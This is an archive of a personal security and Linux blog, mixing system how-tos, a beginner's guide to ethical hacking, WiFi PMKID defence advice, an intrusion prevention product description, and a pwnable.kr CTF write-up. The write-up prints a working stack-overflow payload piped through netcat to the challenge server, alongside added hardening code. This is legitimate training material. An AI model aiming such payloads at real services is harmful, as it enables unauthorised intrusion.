Wednesday, January 16, 2019

HOWTO : Fix Ubuntu Cannot Reboot With Command Properly

If your computer has a UEFI BIOS and Ubuntu installed on it, you may find that it cannot be rebooted properly from the command line. This can be fixed by the following method.

sudo nano /etc/default/grub

Locate the following line :

GRUB_CMDLINE_LINUX=""

and replace it with :

GRUB_CMDLINE_LINUX="reboot=efi"

After that, run the following command to regenerate the GRUB configuration, then reboot from the command line :

sudo update-grub

sudo reboot
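A small shell helper, added here as an example and not part of the original post, that makes the same edit but keeps any parameters already inside GRUB_CMDLINE_LINUX (replacing the whole line as above would drop settings such as "quiet splash"). The function name is my own; run update-grub afterwards as the post describes.

```shell
#!/bin/sh
# Added example: put reboot=efi into GRUB_CMDLINE_LINUX in the given file
# without discarding parameters that are already there.
set -eu

# Usage: set_reboot_efi /etc/default/grub
# Prints the resulting GRUB_CMDLINE_LINUX line; returns 1 if the line is absent.
set_reboot_efi() {
    file=$1
    grep -q '^GRUB_CMDLINE_LINUX=' "$file" || return 1
    if grep -Eq '^GRUB_CMDLINE_LINUX="([^"]* )?reboot=efi( [^"]*)?"' "$file"; then
        :   # already present, leave the file alone
    elif grep -q '^GRUB_CMDLINE_LINUX=""' "$file"; then
        sed -i 's/^GRUB_CMDLINE_LINUX=""/GRUB_CMDLINE_LINUX="reboot=efi"/' "$file"
    else
        # keep the existing parameters and append ours inside the quotes
        sed -i 's/^\(GRUB_CMDLINE_LINUX="[^"]*\)"/\1 reboot=efi"/' "$file"
    fi
    grep '^GRUB_CMDLINE_LINUX=' "$file"
}

if [ "$#" -gt 0 ]; then
    set_reboot_efi "$1"
fi
```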


That's all! See you.


Tuesday, January 15, 2019

HOWTO : Fix Temporary Failure In Name Resolution On Ubuntu 18.04.1

If you are using the Ubuntu 18.04.1 Server version, you may encounter a ping problem: you can ping an IP address but cannot ping a domain name. This can be fixed by the following method.

sudo mv /etc/resolv.conf /etc/resolv.conf-original
sudo ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf
sudo systemctl restart systemd-resolved


You can ping with domain name now.

That's all! See you.


Wednesday, January 09, 2019

How to Become a Hacker (Beginner's Guide)


What is a hacker?

A hacker (黑客) generally refers to a highly skilled person who can make a device operate in ways it was not designed for.

In the field of information security, a hacker is a person with excellent computer skills who can make a computer or its programs operate in ways they were not designed for. As we see it, hackers are divided into Black Hats, White Hats, Grey Hats and Script Kiddies.

Black Hats are the so-called crackers; they commit crimes, but they are technically skilled.

White Hats are information security professionals or researchers; they test systems for vulnerabilities and report the results to the developers or organisations concerned.

Grey Hats are also information security professionals or researchers who test systems for vulnerabilities, but most of them do not report their findings to the developers or organisations concerned; instead they disclose them directly (Full Disclosure). They mostly walk the edge of the law, but without malicious intent.

As for Script Kiddies, they are not part of the IT world. They use hacking tools for fun or for harm.


Why become a hacker?

Whether you are an operating system developer, application developer, programmer, system administrator or an ordinary user, you need to learn hackers' knowledge and techniques. Once you understand how a hacker's attack is carried out, you will know how to defend against it. As the saying goes, "if you do not know offence, how can you know defence?"

Furthermore, once you have finished writing a program, you can carry out a penetration test on it yourself to make sure the finished product has no obvious high-risk vulnerabilities.


Basic requirements for a hacker

A hacker must have a certain level of English, since most technical literature is written in English. A hacker must also have basic programming ability in languages such as C, PHP or Python. Beyond that, a hacker must have some knowledge of networking and its techniques. Last and most important, a hacker must have a creative mind whose thinking is not confined by existing frameworks.

Naturally, a hacker should be familiar with the various versions of Microsoft Windows, including the server versions. In addition, a hacker should also understand Linux and Unix (BSD, macOS and so on).


Learning and practice platforms

There are many practice platforms on the internet; some run online, some offline. Some charge a fee, but most are free. Some of the better-known platforms are:

(1) Hack The Box (online, paid or free, requires a certain level of basic skill before you can register);
(2) VulnHub (offline, free).

There are many walkthroughs of hacking techniques online, mostly as articles or videos. The best-known videos are IppSec's YouTube videos.

There are many high-quality penetration testing books, both domestic and foreign, from which we can learn a great deal about information security. There is also no shortage of high-quality resources available online.


Certification or not?

If you want to make a living in this industry, I suggest obtaining some certifications. But if you are only a hobbyist or a Bug Bounty Hunter, holding a certification makes no necessary difference. Of course, a certification does look better for your reputation.

Better-known bug bounty platforms:

(1) HackerOne
(2) BugCrowd

As for certifications, those that can be taken in Hong Kong, China and are well known in Hong Kong include:

(1) OSCP (to be completed within 23 hours and 45 minutes; hands-on exam; taken at home but proctored);
(2) CEH (to be completed within four hours; multiple-choice exam);
(3) CEH (Practical) (to be completed within six hours; hands-on exam);
(4) CISSP (to be completed within three hours; multiple-choice exam).

OSCP and CEH fall within the scope of penetration testing, while CISSP falls within information security management.


Conclusion

To become a hacker, we need to read a lot and practise a lot, to make sure we know and understand the relevant techniques. But the most important thing is not to break the law; everyone is responsible for their own actions. Without written authorisation from the other party, you may not carry out a penetration test against them, or you will end up in prison with your future ruined.

Samiux
OSCE OSCP OSWP
Written on 9 January 2019, Hong Kong, China


Wednesday, January 02, 2019

HOWTO : Protect against the PMKID attack

On Aug 04, 2018, the developer of hashcat discovered a new way to attack WPA/WPA2 Wifi, namely the PMKID attack, while looking for a new way to attack the new WPA3. This attack requires no Wifi client connected to the Wifi router and does not need the 4-way handshake. Meanwhile, almost all modern Wifi routers are vulnerable to this attack.

I recently conducted a quick test in my living area and found that all Wifi routers (including mine) are vulnerable to this attack. With hashcat and/or good dictionaries used properly, the WPA PSK (Pre-Shared Key) password can be obtained without any problem.

In conclusion, WPA2 is no longer safe!

However, we can protect our Wifi by the following methods :

(1) Make the WPA PSK password as long and as complex as possible (mine is 26 characters long);
(2) Make sure the WPA PSK password cannot be found in the available dictionaries (such as rockyou);
(3) Make sure your Wifi router can prevent ARP (Address Resolution Protocol) spoofing, or apply MAC address filtering where possible;
(4) If possible, change your WPA PSK password at least once a month; and
(5) Keep your Wifi signal as weak as possible. Yes, make it as weak as possible.
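A passphrase check for points (1) and (2), added here as an example that is not from the original post or from hashcat: before looking a candidate PSK up in a wordlist it applies the cheap manglings a dictionary attack would try (lowercasing, stripping trailing digits, undoing leetspeak), and it reports an entropy upper bound. The wordlist is a constructed stand-in for rockyou, and the 20-character minimum is my own assumption.

```python
import math

# Constructed stand-in for a leaked-password wordlist such as rockyou (not the real file).
SAMPLE_WORDLIST = {"password", "123456", "iloveyou", "sunshine", "letmein", "qwerty", "monkey"}

# Common leetspeak substitutions, undone before the wordlist lookup.
LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "3": "e", "5": "s", "7": "t", "!": "i"})
TRAILING = "0123456789!@#$%^&*.?"


def mangled_forms(psk: str) -> set:
    """Cheap variants a dictionary attack tries: lowercase, trailing digits or
    punctuation stripped, leetspeak undone."""
    base = psk.lower()
    stripped = base.rstrip(TRAILING)
    return {base, stripped, base.translate(LEET), stripped.translate(LEET)}


def entropy_bits(psk: str) -> float:
    """Upper bound on entropy, assuming a uniformly random string over the
    character classes actually used (the best case for the defender)."""
    size = 0
    if any(c.islower() for c in psk):
        size += 26
    if any(c.isupper() for c in psk):
        size += 26
    if any(c.isdigit() for c in psk):
        size += 10
    if any(not c.isalnum() for c in psk):
        size += 33
    return len(psk) * math.log2(size) if size else 0.0


def check_psk(psk: str, wordlist=SAMPLE_WORDLIST, min_len=20) -> dict:
    """Report why a WPA PSK is weak against an offline attack on its PMKID."""
    issues = []
    if not 8 <= len(psk) <= 63:
        issues.append("length outside the 8-63 character WPA PSK range")
    elif len(psk) < min_len:
        issues.append(f"shorter than {min_len} characters")  # assumed minimum
    hits = mangled_forms(psk) & set(wordlist)
    if hits:
        issues.append("reduces to wordlist entry: " + ", ".join(sorted(hits)))
    return {"ok": not issues, "entropy_bits": round(entropy_bits(psk), 1), "issues": issues}
```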


That's all! See you.


Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF categories on the pwnable.kr website. The challenge I am going to do is named bof. There are already many writeups on the internet. However, I am going to explain what I learnt from this challenge.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examined the source code and found that we need to change the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you enter into the "overflowme" variable, the "key" is not changed, as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.

Load the binary in gdb with PEDA and run "checksec". It confirms that NX is enabled, along with other restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassemble the "func" function.

disass func



In the "func" function, these are the instructions I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

In "lea eax,[ebp-0x2c]", "ebp-0x2c" may be where the "overflowme" variable lives, and its address is saved in the eax register.

In "DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may hold the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then run the program with "r"; when prompted, enter "helloworld" as the "overflowme" input.

After entering "helloworld", I examine "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirms what I suspected. I then compute the offset between the two addresses with Python. The offset is 52.

Once the offset is known, I overwrite "0xdeadbeef" with "0xcafebabe" using the exploit command below. The "cat" command keeps the shell interactive.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000
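The defensive side of the same lesson, added here as an example and not the challenge's own source: the frame arithmetic behind the offset of 52 (0x2c up to ebp, plus saved ebp and return address to reach the argument at ebp+0x8), and a hardened func() that reads with a bounded line reader instead of an unbounded call such as gets(), which is what the 32-byte buffer and unchanged hard-coded key above suggest the original uses (my assumption). Function names and the tmpfile-based harness are mine.

```c
#include <stdio.h>
#include <string.h>

/* Bytes from a local buffer at [ebp-buf_disp] to an argument at [ebp+arg_disp]:
 * buffer, saved ebp and return address. For bof: 0x2c + 0x8 = 52. */
size_t overflow_offset(unsigned buf_disp, unsigned arg_disp)
{
    return (size_t)buf_disp + arg_disp;
}

/* Bounded replacement for gets(): keeps at most dstsz-1 bytes, drops the newline
 * and drains the rest of an over-long line. Returns the number of bytes kept. */
size_t read_line_bounded(char *dst, size_t dstsz, FILE *in)
{
    if (dstsz == 0 || fgets(dst, (int)dstsz, in) == NULL) {
        if (dstsz) dst[0] = '\0';
        return 0;
    }
    size_t n = strcspn(dst, "\n");
    if (dst[n] == '\n')
        dst[n] = '\0';
    else {                      /* line did not fit: discard the remainder */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return n;
}

/* Hardened form of the challenge's func() (assumed shape): same key comparison,
 * but the 32-byte buffer can no longer overflow into the stack argument. */
int func_hardened(int key, FILE *in)
{
    char overflowme[32];
    read_line_bounded(overflowme, sizeof overflowme, in);
    return key == (int)0xcafebabe;
}

/* Run func_hardened on a constructed input line instead of stdin. */
int run_with_input(int key, const char *input)
{
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    fputs(input, in);
    rewind(in);
    int result = func_hardened(key, in);
    fclose(in);
    return result;
}
```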



The flag is :

daddy, I just pwned a buFFer :)




That's all! See you.


Friday, December 07, 2018

HOWTO : Flash Player on Kali Linux 2018.4

Kali Linux 2018.4 does not come with the latest version of Flash Player. Since Flash Player may be vulnerable, we need to keep it updated. However, most tutorials on the internet only teach you to copy the Flash Player object file (libflashplayer.so) to /usr/lib/mozilla/plugins/. It is very hard to keep track of the latest update that way. The following method may be the best way to install Flash Player on Kali Linux 2018.4. It works for Firefox and Chrome as well as Chromium.

Step 1 :

apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfree


Step 2 :

Go to https://github.com/cybernova/fireflashupdate to download fireflashupdate.sh

wget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh

chmod +x fireflashupdate.sh
./fireflashupdate.sh


Step 3 :

To update Flash Player :

./fireflashupdate.sh

Step 4 :

You may need to change the setting in Firefox under Add-ons - Plugins - Shockwave Flash from "Ask to Activate" to "Always Activate".

That's all! See you.


Thursday, December 06, 2018

HOWTO : Virtualbox 5.2.22 on Kali Linux 2018.4

The current version of Virtualbox for Kali Linux 2018.4 is the latest version, 5.2.22. Since the official build of Virtualbox cannot be installed on Kali Linux, the Kali package is installed instead. Luckily, it is the latest version.

apt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-iso


That's all! See you.


Monday, November 26, 2018

HOWTO : nVidia and HashCat on Kali Linux 2018.4

CPU : Intel i7-8750H (6-core with HyperThreading and integrated graphics)
Extra graphics card : nVidia GTX 1060 (laptop)

There are two graphics cards on the same system, namely Optimus on a laptop. Installing the nVidia display driver on Kali Linux 2018.4 is different from Ubuntu 18.04.1 on the same system. You can refer to the link here for Ubuntu 18.04.1, even though both use the same version of the nVidia display driver - version 390.87 at the time of this writing.

Step 1 :

apt update
apt install nvidia-kernel-dkms primus bumblebee bbswitch-dkms nvidia-smi


Step 2 :

Reboot the system.

To confirm the installation.

nvidia-smi

Step 3 :

Install HashCat, which does not require CUDA.

apt install hashcat-nvidia

Step 4 (optional) :

To install CUDA.

apt install nvidia-cuda-toolkit

To run a program that requires CUDA.

bumblebeed --daemon
optirun [program]


That's all! See you.


Friday, October 26, 2018

HOWTO : Tensorflow 1.11.0 on Ubuntu 18.04.1 LTS with Anaconda3 5.3.0

Install Anaconda3, which is based on Python 3. The current version of Python in Anaconda3 is 3.7.x.

sudo apt install build-essential libssl-dev libffi-dev python3-dev

wget https://repo.continuum.io/archive/Anaconda3-5.3.0-Linux-x86_64.sh

chmod +x Anaconda3-5.3.0-Linux-x86_64.sh

./Anaconda3-5.3.0-Linux-x86_64.sh

Install Anaconda3 to /home/samiux/anaconda3 (for the current user, samiux) and then answer "yes" to allow it to change samiux's .bashrc. (Replace "samiux" with your username.)

source /home/samiux/.bashrc

Update Anaconda3.

conda update --prefix /home/samiux/anaconda3 anaconda
conda update -n base conda


Since the current Tensorflow 1.11.0 only supports Python 3.6 among the Python 3.x versions, we need to install Python 3.6 in a virtual environment for Tensorflow.

conda create -n venv pip python=3.6
conda install tensorflow -n venv


To activate the virtual environment, that is, Python 3.6.

conda activate venv

To deactivate it when not using Python 3.6 and Tensorflow.

conda deactivate

To test the Tensorflow installation.

(venv) samiux@ubuntu:~$ python -c "import tensorflow as tf; print(tf.__version__)"

It will display the current version of Tensorflow, which at the time of this writing is 1.11.0.

1.11.0

That's all! See you.


Sunday, October 21, 2018

China - No Wallet

China's Great Leap to Wallet-Free Living - Moving Upstream

Amazing China: Mobile Payments Change Way of Life in China

Amazing China: Crazy mobile payment in China

Sunday, September 09, 2018

Croissants - Intrusion Detection and Prevention System

Croissants - Intrusion Prevention System

Croissants (牛角麵包) is an open source project, but there is a commercial project of the same name; the open source version is called Croissants (Community Edition). The paid version has technology to block probing by network scanners and to push updates; otherwise it is broadly the same as the open source version.

Croissants is to a considerable degree similar to a Unified Threat Management System (UTM) and a Next Generation Firewall (NG Firewall); the only difference is that Croissants has no firewall.

Croissants is a system designed and developed by a hacker to deal with hackers, whether they are ethical or malicious.

Features of the open source version :

It has most of the features of a UTM and NG Firewall, such as exploit prevention, anti-virus, malicious IP address blacklisting, malware prevention, filtering of web page attacks, blocking of Tor browsing, blocking of hostile network traffic, detection of network scanner scans, and so on.

As for performance, it has ultra-low latency, which effectively improves the playability of online games, and it can stream 4K media smoothly. It can also handle roughly 40GB or more of traffic, which of course depends heavily on the hardware specification.

As for deployment, it can be placed almost anywhere in the network, both outside and inside. Combined with Audra (an intrusion detection system), every network segment can be covered. Audra is an intrusion detection system designed on the basis of Croissants (Community Edition), with exactly the same components.

Features of the paid version :

Besides the features of the Community Edition, it also has push update technology: in an emergency, Croissants can be updated remotely at once to achieve the best intrusion prevention.

In addition, it can block all probing by network scanners, so that hackers cannot effectively obtain information about their intended target and therefore cannot mount an effective attack. Attacking blindly is futile. This can prevent or delay the possibility of intrusion, and the feature is particularly suited to environments with servers deployed in the network.

Samiux
OSCE OSCP OSWP


************


Croissants - Intrusion Detection and Prevention System

Croissants is an open source project and a commercial project at the same time. The open source project is named Croissants (Community Edition, CE), while the commercial one is Croissants. Croissants and Croissants CE are almost the same. However, Croissants has some outstanding techniques, such as push update and upgrade as well as blocking network scanning.

Croissants is very similar to a Unified Threat Management System (UTM) and a Next Generation Firewall (NG Firewall). However, Croissants does not have a firewall.

Croissants is designed by a hacker to defend against hackers. He knows what hackers are doing and thinking, regardless of whether they are ethical or malicious.

Croissants CE Features :

Croissants CE has similar features to a UTM and NG Firewall, such as preventing vulnerability exploits, anti-virus, malicious IP address blacklisting, preventing malicious software, filtering web page attacks, preventing access to the Tor network, blocking malicious traffic, detecting network scanning, etc.

It is an ultra-low latency system, which is ideal for demanding online games and 4K video streaming. The maximum bandwidth of Croissants is over 40GB, depending on the hardware configuration.

Croissants CE can be placed anywhere in the network, including outside and inside the network segments. When deployed together with Audra (Intrusion Detection System), traffic monitoring in the network can be covered completely. Audra is designed on the basis of Croissants CE.

Croissants Features :

Croissants has all the features of Croissants CE, but it also has push update and upgrade features. It provides an emergency update or upgrade in order to give the network better protection when needed.

In addition, it can also block network scanning. Once scanning is blocked, hackers cannot obtain information about the services and ports of the network/servers, and cannot launch an attack on the network blindly. As a result, you may be protected from attack, or the attack may be delayed. Croissants is ideal for networks that provide connections to the public.

Samiux
OSCE OSCP OSWP



Sunday, August 26, 2018

HOWTO : Intel and nVidia GPUs on Ubuntu 18.04.1 LTS

The version of the nVidia driver for Ubuntu 18.04.1 is 390 at the time of this writing. There are 3 methods to switch between the Intel GPU and the nVidia GPU. However, these require you to reboot or log in again for the change to take effect.

(A) nVidia Driver Install

sudo apt install bbswitch-dkms nvidia-dkms-390 nvidia-driver-390 nvidia-headless-390 nvidia-kernel-common-390 nvidia-prime nvidia-settings nvidia-utils-390 xserver-xorg-video-nvidia-390 nvidia-cuda-toolkit

Method 1 - Reboot is required
nvidia-settings

Select nVidia GPU or Intel GPU from "Prime" in the menu. After that, reboot your box.

This method works only when the nVidia driver is loaded. You need to reboot your box for the change to take effect.

To confirm the change :

prime-select query

Method 2 - Reboot is required

To change to Intel GPU :

You need to reboot your box for the change to take effect.

sudo prime-select intel

To change to nVidia GPU :

sudo prime-select nvidia

You need to reboot your box for the change to take effect.

To check the settings :

prime-select query

Method 3 - Relogin is required

To install the modified version of prime-select :

sudo apt install git rustc cargo lightdm
git clone https://github.com/matthieugras/Prime-Ubuntu-18.04

cd Prime-Ubuntu-18.04
cd prime_socket/src
sudo make install


The "prime-select" binary is located at /usr/local/bin.

Rename the original "prime-select" :

sudo mv /usr/bin/prime-select /usr/bin/prime-select-original

Change to lightdm :

sudo dpkg-reconfigure gdm3

Select lightdm and then reboot the box.

Prime sync for a tear-free laptop panel :

sudo nano /etc/modprobe.d/zz-nvidia-modeset.conf

Add the following lines :

# enable prime-sync
options nvidia-drm modeset=1


Then run the following command and then reboot your box :

sudo update-initramfs -u

To change to Intel GPU :

sudo prime-select intel

The box will force you to log out and wait for you to log in again.

To change to nVidia GPU :

sudo prime-select nvidia

The box will force you to log out and wait for you to log in again.

To check the settings :

prime-select query

(B) Optional

To check which nVidia driver version is installed :

ubuntu-drivers devices

To install the nVidia driver automatically :

sudo ubuntu-drivers autoinstall

(C) Conclusion

Set the Intel GPU for power saving and the nVidia GPU for performance. For Kali Linux or Parrot Security OS users, I recommend using Method 2 after installing the nVidia driver. The package names of the nVidia driver for Kali Linux and Parrot Security OS are different from Ubuntu 18.04.1 LTS. When using Method 3, the Intel display card cannot display video properly. However, Method 2 has no such problem.

That's all! See you.


Thursday, August 09, 2018

Penetration Testing and Capture The Flag

On my first encounter with Capture The Flag (CTF) competitions, I found them very different from real penetration testing (Penetration Testing). Take the web challenges on a CTF practice site as an example: the challenge gives hints leading to the key for the next stage, or hints with which to solve the challenge itself. In a real-world website penetration test there are no hints; the penetration tester must use their own methods to gather as much information about the site as possible before taking further action. Moreover, CTF challenges are mostly detached from reality, and very tricky.

Personally, I think that if a professional penetration tester spends a long time immersed in CTF challenges, it may affect their professional thinking and their approach to penetration testing, and bring no real gain in professional knowledge; but there is no harm in playing them as a game in one's spare time.

As for the other CTF event, attack and defence, I have not yet had the chance to try it, so I will not pass judgement. By chance, I recently played some challenges I knew on a rather poor CTF practice site (beta.ctflearn.com) and ranked 27th among over twelve thousand players (as at 9 August 2018). I did not feel I learned anything new in the process, which is a pity.

Finally, in my opinion, if you want real gains in penetration testing knowledge and skills, I think the most effective way is to take part in bug bounty (Bug Bounty) programmes. Finding a vulnerability and earning a reward is of course a pleasure, but even if you earn no reward, you can practise on a legal platform, because the targets in bug bounty programmes are all real cases.

Samiux
OSCE OSCP OSWP